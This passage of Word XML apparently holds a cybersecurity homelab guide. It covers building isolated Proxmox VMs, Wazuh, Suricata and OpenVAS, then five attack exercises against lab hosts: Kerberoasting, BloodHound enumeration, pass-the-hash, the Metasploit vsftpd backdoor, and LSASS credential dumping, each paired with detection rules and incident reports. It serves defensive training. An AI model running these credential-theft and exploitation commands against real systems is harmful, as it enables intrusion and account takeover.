        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing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These SHOULD work (all on vmbr2):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ping -c 3 10.10.10.10    # DC — MUST reply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ping -c 3 10.10.10.20    # Win10 — MUST reply</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing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These MUST FAIL (isolation):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ping -c 3 192.168.10.1   # pfSense — MUST timeout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ping -c 3 192.168.30.20  # Wazuh — MUST timeout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ping -c 3 8.8.8.8        # Internet — MUST timeout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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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isolation pings succeed — STOP. Recheck vmbr2 config in Proxmox /etc/network/interfaces.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10.6 — Install Wazuh Agent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-s https://packages.wazuh.com/key/GPG-KEY-WAZUH | sudo apt-key add -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echo 'deb https://packages.wazuh.com/4.x/apt/ stable main' | sudo tee /etc/apt/sources.list.d/wazuh.list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update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WAZUH_MANAGER='192.168.30.20' WAZUH_AGENT_NAME='kali-attacker' apt install -y wazuh-agent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systemctl enable --now wazuh-agent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/var/ossec/bin/agent_control -l   # should show: kali-attacker Active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10.7 — Snapshot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qm snapshot 200 clean-state --description 'Clean Kali before exercises'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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 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METASPLOITABLE 2 — VULNERABLE TARGET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vmbr2 isolated · import VMDK · no Wazuh agent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11.1 — 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to: https://sourceforge.net/projects/metasploitable/files/Metasploitable2/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Download zip → unzip → you get a .vmdk file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11.2 — Upload to Proxmox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From your Mac terminal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scp Metasploitable2.vmdk root@192.168.30.10:/var/lib/vz/template/iso/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11.3 — Import into Proxmox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 Proxmox shell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qm create 203 --name metasploitable --memory 512 --cores 1 --net0 virtio,bridge=vmbr2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qm importdisk 203 /var/lib/vz/template/iso/Metasploitable2.vmdk local-lvm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qm set 203 --scsi0 local-lvm:vm-203-disk-0 --boot c --bootdisk scsi0 --scsihw virtio-scsi-pci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qm start 203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11.4 — Set Static IP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 console (VM 203 → Console). Login: msfadmin / msfadmin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nano /etc/network/interfaces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auto eth0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iface eth0 inet static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address 10.10.10.30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netmask 255.255.255.0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/etc/init.d/networking restart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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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NOT install Wazuh on Metasploitable. Leave it as a pure vulnerable target.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11.5 — Test and Snapshot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From Kali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ping -c 3 10.10.10.30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nmap -sV 10.10.10.30    # should show many open vulnerable services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Snapshot in Proxmox shell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qm snapshot 203 clean-state --description 'Clean Metasploitable'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All 3 Agents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C" w:sz="4"/>
              <w:left w:val="single" w:color="1E6B3C" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2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VERIFY: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Wazuh dashboard → Agents. All three should show green Active status before proceeding.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dc01 in Wazuh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Active (green)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win10 in Wazuh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Active (green)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kali-attacker Wazuh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Active (green)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Metasploitable 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Replies from Kali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snapshots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clean-state exists on all 4 VMs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☐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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 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SURICATA IDS/IPS ON PFSENSE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Install last · WAN interface · ET Open rules · IPS mode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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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 Suricata LAST. In IPS mode it can block legitimate traffic while you are still building the lab.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12.1 — Install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 → Package Manager → Available Packages → suricata → Install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12.2 — Configure on WAN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Services → Suricata → Interfaces → Add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Interface: WAN  |  Enable ✓  |  Block Offenders ✓  |  Which IP to Block: Both  |  Kill States ✓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12.3 — Enable Rulesets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Services → Suricata → Interfaces → WAN →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✓ Emerging Threats Open  |  ✓ Snort Community Rules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Services → Suricata → Updates → Update Rules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12.4 — Start and Verify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Services → Suricata → Interfaces → click Start on WAN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Wait 30 seconds then test from laptop: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ping 8.8.8.8    # must still work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-I https://google.com    # must still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4F00" w:sz="4"/>
              <w:left w:val="single" w:color="7B4F00" w:sz="16"/>
              <w:bottom w:val="single" w:color="7B4F00" w:sz="4"/>
              <w:right w:val="single" w:color="7B4F00" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFF4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internet breaks, check Services → Suricata → Logs → WAN for false positives and add suppress rules.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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 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OPENVAS — VULNERABILITY SCANNER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VM on Proxmox · scan lab targets · CVSS findings report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13.1 — Create VM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VM ID: 204  |  Name: openvas  |  Clone template 9000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CPU: 4 cores  |  RAM: 8192 MB  |  Disk: 60 GB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Network: vmbr0 | VLAN 30 | IP: 192.168.30.30/24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13.2 — Install OpenVAS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apt update &amp;&amp; apt upgrade -y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apt install -y openvas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gvm-setup    # takes 15–30 min — downloads vuln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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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the admin password printed at the end of gvm-setup.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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gvm-start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Access at: https://192.168.30.30:9392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13.3 — Run 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Scans → Tasks → New Task → Scan Config: Full and Fast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Target: Hosts = 10.10.10.0/24  |  Start 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Wait 15–45 minutes → view findings sorted by CVSS severity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 3+ findings as remediation report in GitHub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AAFF"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
              <w:t xml:space="preserve">STEP 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ATTACK EXERCISES + INCIDENT REPORTS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5 exercises · Wazuh evidence · fill IR templates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0000" w:sz="4"/>
              <w:left w:val="single" w:color="8B0000" w:sz="16"/>
              <w:bottom w:val="single" w:color="8B0000" w:sz="4"/>
              <w:right w:val="single" w:color="8B0000" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FDE8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CRITICAL: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Before EVERY exercise: snapshot all VMs. After EVERY exercise: roll back all VMs.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Pre-Exercise Snapshot Command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Run in Proxmox shell before each exercise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qm snapshot 200 pre-exercise --description 'Before exercise'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qm snapshot 201 pre-exercise --description 'Before exercise'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qm snapshot 202 pre-exercise --description 'Before exercise'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qm snapshot 203 pre-exercise --description 'Before exercise'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Exercise 1 — Kerberoasting (T1558.003)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From Kali terminal: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python3 /usr/share/doc/python3-impacket/examples/GetUserSPNs.py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lab.local/jsmith:Password123! -dc-ip 10.10.10.10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-request -outputfile /tmp/hashes.txt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hashcat -m 13100 /tmp/hashes.txt /usr/share/wordlists/rockyou.txt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Wazuh: look for rule 100001 — Kerberoasting RC4 TGS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Screenshot alert → fill IR-001-kerberoasting.md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Exercise 2 — BloodHound Enumeration (T1087.002)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neo4j start &amp;&amp; sleep 30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bloodhound-python -u jsmith -p 'Password123!' -d lab.local -ns 10.10.10.10 -c all --zip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bloodhound &amp;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Upload zip → run query: Find Shortest Paths to Domain Admins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Wazuh: rule 100002 — LDAP replication / AD enumeration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Screenshot graph + alert → fill IR-003-bloodhound.md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Exercise 3 — Pass-the-Hash (T1550.002)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python3 /usr/share/doc/python3-impacket/examples/secretsdump.py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lab.local/Administrator:Lab@Password123!@10.10.10.10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python3 /usr/share/doc/python3-impacket/examples/psexec.py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-hashes :NTLMHASH administrator@10.10.10.10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Wazuh: rule 100003 — NTLM network logon event 4624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Screenshot → fill IR-002-pass-the-hash.md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Exercise 4 — Metasploit vsftpd Backdoor (T1190)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msfconsole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 exploit/unix/ftp/vsftpd_234_backdoor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 RHOSTS 10.10.10.30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whoami    # should return: root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Wazuh: Suricata alert + process creation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Screenshot shell + alert → fill IR-004-vsftpd.md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Exercise 5 — LSASS Credential Dump (T1003.001)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python3 /usr/share/doc/python3-impacket/examples/secretsdump.py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LAB/Administrator:Lab@Password123!@10.10.10.20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Wazuh: rule 100006 — LSASS handle access — level 15 critical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Screenshot → fill IR-005-lsass-dump.md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Post-Exercise Rollback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qm rollback 200 clean-state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qm rollback 201 clean-state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qm rollback 202 clean-state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qm rollback 203 clean-state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Push Evidence to GitHub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~/homelab-portfolio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add 07-cyber-lab/screenshots/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add 08-wazuh-siem/incident-reports/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add 08-wazuh-siem/screenshots/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commit -m 'Add attack exercise evidence and IR reports'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push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C" w:sz="4"/>
              <w:left w:val="single" w:color="1E6B3C" w:sz="16"/>
              <w:bottom w:val="single" w:color="1E6B3C" w:sz="4"/>
              <w:right w:val="single" w:color="1E6B3C" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E2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VERIFY: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are done. All 14 steps complete. Your GitHub portfolio now documents a fully built enterprise homelab with a working isolated cybersecurity lab, SIEM, and 5 incident response reports.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2026-06-18T21:50:16.040Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-18T21:50:16.054Z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